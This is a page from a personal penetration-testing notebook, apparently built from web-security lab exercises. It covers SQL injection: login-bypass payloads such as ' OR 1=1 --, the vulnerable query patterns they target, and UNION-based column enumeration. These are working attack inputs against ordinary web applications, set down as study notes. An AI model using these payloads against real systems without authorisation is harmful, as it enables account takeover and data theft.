🎃
Jackmeister's Playbook
  • Welcome
  • Web Pentest
    • Mind Maps
    • Server Site Attacks
      • php type juggling
      • SSTI
      • SQL
        • PSG SQL
        • SQL Database Uses
        • SQL Injection
        • Blind SQL injection
        • SQLITE injection
      • psy shell
    • Recon
      • DNS Hunting
      • Web Tech Hunting
      • Credentials Harvesting
      • Subdomain Hunting
      • Javascript Hunting
    • Directory Brute Forcing
    • File Upload Tricks
      • PHP htaccess and ASP web.config bypass
      • PHP Exiftool edit and upload
      • PHP Extensions payloads / Cheatsheet
      • PHP disable_functions bypass
    • Client Site Attacks
      • Case Study - XSS-GPT
      • XSS
        • XSS All in one
        • XSS cookie stealing
        • Payloads / Cheatsheet
      • Javascript Crafting
      • PDF
    • CMS / Framework
      • apache / xampp
      • Django
      • Manegto
      • Joomla
      • Jenkins
      • Flask jinja2
      • tomcat
      • Drupal
      • nodejs
      • wordpress
    • Google Dorking
    • API
    • Command Injection
      • Command Injection Payloads/Cheatsheet
    • Rewrite URL
    • HTTP Request Smuggling (CL.TE)
  • Network Pentest
    • Linux
      • Internal Port Scanning
      • Privileges Escalation
      • Finding files
      • OVA2ROOT
    • Window
      • AV Evading
      • Chrome Password Extract
      • Internal Port Scanning
      • Privileges Escalation
      • ALL IN ONE
      • THM Priv Esc
      • Post Compromise
    • Port Forwarding
      • Playground Setup
    • Exploit Hunting
      • Searchsploit
    • tty-interactive-shell
    • Active Directory (AD)
      • Crackmapexec
  • Wireless Pentest
    • Airgeddon
    • Evil Twin
    • Aircrack
  • Vulnerability Assessment
    • Nmap
    • Nessus
  • General
    • Kiosk Escaping
    • Credential Bruteforcing
  • System Hardening
  • Phishing
    • Gophish
    • Mailing Server
    • SMS Server
    • DNS Server
Powered by GitBook
On this page
  • Basic SQL Login Auth bypass
  • ' order by 1 --
  • will become
  • '+order+by+1+--
  • Type of SQL injections
  • UNION attack to retreive data from other table

Was this helpful?

  1. Web Pentest
  2. Server Site Attacks
  3. SQL

PSG SQL

Basic SQL Login Auth bypass

Note : If inside burp repeater , remember to CTRL + U to format the payload

' order by 1 --

will become

'+order+by+1+--

Vuln code

`SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`

Crafting

SELECT * FROM users WHERE username = 'administrator' --' AND password = 'bluecheese'

SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'bluecheese'

Exploit Delivery

administrator' --
' OR 1=1 --

Type of SQL injections

  • inband SQLi : you get response aka normal sqli

  • inferential SQLi : you don't get response aka blind sqli

  • Out-of-band-SQLi : your use a Server as man in middle send back the response to u

UNION attack to retreive data from other table

Vuln code

select * from categoryTable where category='Coporate Gifts'
select * from categoryTable where category='Coporate Gifts'

Determine number of columns

' order by 1 -- 
' order by 2 --

Combine order by with select query

select * from categoryTable where category='' order by 1 --anything here gets ignored

UNION SELECT can be used to double check the number of columns

' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL--

Ensure same Data type

'a' , 'a'
123 , 'a123'

  • characters?

  • alphanumeric?

  • numbers?

PreviousSQLNextSQL Database Uses

Last updated 1 year ago

Was this helpful?